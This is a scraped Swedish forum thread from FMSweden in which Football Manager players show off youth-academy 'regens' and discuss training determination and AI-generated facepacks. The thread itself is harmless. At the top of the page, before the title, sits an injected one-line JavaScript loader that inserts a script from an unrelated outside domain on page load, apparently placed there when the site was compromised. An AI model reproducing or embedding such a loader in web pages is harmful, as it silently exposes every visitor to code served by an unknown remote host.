;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Regens! – Football Manager 2021 – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

Regens!

23 Inlägg
8 Users
46 Reactions
3,264 Visningar
jonatannk
(@jonatannk)
Estimable Member
Topic starter  

En av de roligare utmaningarna med FM är ju ungdomsintag. Att analysera och träna upp spelare som i framtiden kan vara en central stomme i truppbygget.
Jag tänkte att en sådan här tråd kan vara kul att ha, för att visa upp vad man har lyckats få fram!

Ha i åtanke att jag fortfarande spelar FM19. Jag är inne på säsongen 28/29.
Dessa spelare är egna produkter där vissa är en del av a-laget medan andra är utlånade för att stå på tillväxt.

Majid de Vries är antagligen den bästa av alla. Tredje kapten och ett av de första namnen jag tar ut i en startelva.

Robin dos Santos är en egen talang som efter en mycket stark säsong hos oss (21 mål på 36 framträdanden, 7,37 i snitt) såldes till Arsenal för 650 mkr. Där har han haft det svårare att ta plats, med bland annat en låneperiod i Roma i bagaget, men han levererar allt jämt fina prestationer.

Går vi vidare till de spelare som jag har eller haft i truppen, men som inte är fostrade hos oss är dessa några av mina utplock på de jag ändå tycker fått absolut bäst utveckling.

Who has two thumbs and doesn't give a crap?

Citera
(@pcch7)
Trusted Member

Mina finaste regens hittils

Kristijan, Daniel Nilsson, zXc and 1 people reacted
SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@pcch7

Snacka om att Morri kommer få bära sitt San Marino på sina axlar haha 

SvaraCitera
(@pcch7)
Trusted Member

@zxc Det kan man säga haha. Han har ju italiensk medborgarskap också men San Marino han först ? tänkte jag skulle ha Italiens mittlås där med honom och Di Renzo men icke

zXc reacted
SvaraCitera
jonatannk
(@jonatannk)
Estimable Member
Topic starter  

Fick precis upp denna kille i ungdomsintag. Detta är nog den absolut bästa spelaren jag någonsin fått fram! Herrejävlar vilka attribut, tyvärr väldigt låg Beslutsamhet men likväl. SATAN!

SvaraCitera
(@pcch7)
Trusted Member

@jonatannk ja den där lär nå långt ? 

SvaraCitera
(@pcch7)
Trusted Member

Snodde till mig den här islänningen från Heerenveens akademi. Skolade om till anfallare, han smällde in ett hattrick i landslagsdebuten vid 16 års ålder ? 

zXc reacted
SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@pcch7

När man ljugit i sitt CV och sökt jobbet som isländsk viking: 

Namn: Park Sung-Chan 
Längd: 158 cm 
Vikt: 58 kg 

SvaraCitera
(@pcch7)
Trusted Member

@zxc Han sticker ju ut lite får man säga ? lite synd att regens inte växer på längden men han ska nog klara sig ändå

SvaraCitera
jonatannk
(@jonatannk)
Estimable Member
Topic starter  
Postad av: @jonatannk

Fick precis upp denna kille i ungdomsintag. Detta är nog den absolut bästa spelaren jag någonsin fått fram! Herrejävlar vilka attribut, tyvärr väldigt låg Beslutsamhet men likväl. SATAN!

Hur skulle ni gå tillväga för att träna upp hans beslutsamhet?

SvaraCitera
(@pcch7)
Trusted Member

@jonatannk Vet inte om det går att träna det

SvaraCitera
(@palst)
Active Member

@jonatannk Sätt honom i en mentorskapsgrupp tillsammans med en äldre rutinerad spelare som har bra personlighetsdrag och hög beslutsamhet. Om du inte har någon lämplig så kanske du kan få tag i nån gammal stjärna på dekis som bosman. 🙂

Upplever att bötfälla spelare för dålig insats under match kan höja beslutsamhet och arbetskapacitet rätt mycket i längden, även om det är lite risky om spelaren blir förbannad.

SvaraCitera
Yayakolo
(@yayakolo)
Medlem

Fick upp den här killen med Brighton. Spontant ser han ju rätt spännande ut.

Micke, The Gustine, zXc and 1 people reacted
SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@yayakolo

Så fort man får upp en grym mittback så är han alltid kortare än 180.. 

SvaraCitera
(@crownstreet)
New Member

Hej på er! 

Jag avslutar allt som oftast mina saves när det blir för mycket regens. Uppskattar inte alls deras ansikten. Må låta löjligt, men blir för orealistiskt för mig. 

Därför undrar jag: finns det något sätt som gör att jag kan få mina regens med en svart siluett istället, som andra spelare i spelet har? 

Tack på förhand! 

SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

@crownstreet

Hade rekommenderat att du tar dig en titt på Zealands regen facepack - AI genererade "riktiga" ansikten. Har förändrat mitt spel totalt till det bättre, där alla regens nu går runt och har riktiga ansikten. Enda kruxet är väl att det kan vara lite jobbigt att uppdatera detta varje säsong, men jag tycker att det tar FM till en HELT annan nivå! 

Checka hans youtube video om just detta - https://www.youtube.com/watch?v=pmdIkhfmY6w

Jag laddar även upp en bild på min spelare som är regen, så får du se hur det kan se ut med facepack'et. 

Micke reacted
SvaraCitera
(@crownstreet)
New Member

@maximtsigalko Tack snälla för tips! 

SvaraCitera
(@pcch7)
Trusted Member

Norpade lite talanger

SvaraCitera
friggan
(@friggan)
Estimable Member

@maximtsigalko

Detta finns också med DF11-version. Men då uppdateras allt helt automatiskt hela tiden. Jag tyker att spelet blir EXTREMT EXTREMT mycket bättre nu. Riktiga bilder känns så jävla mycket roligare!

MaximTsigalko and Micke reacted
SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

Fick precis fram denna framtida legend ur min akademi. 15 år gammal och redan brutalt bra!

https://imgur.com/DSlimcw

Micke reacted
SvaraCitera
Sida 1 / 2
Share: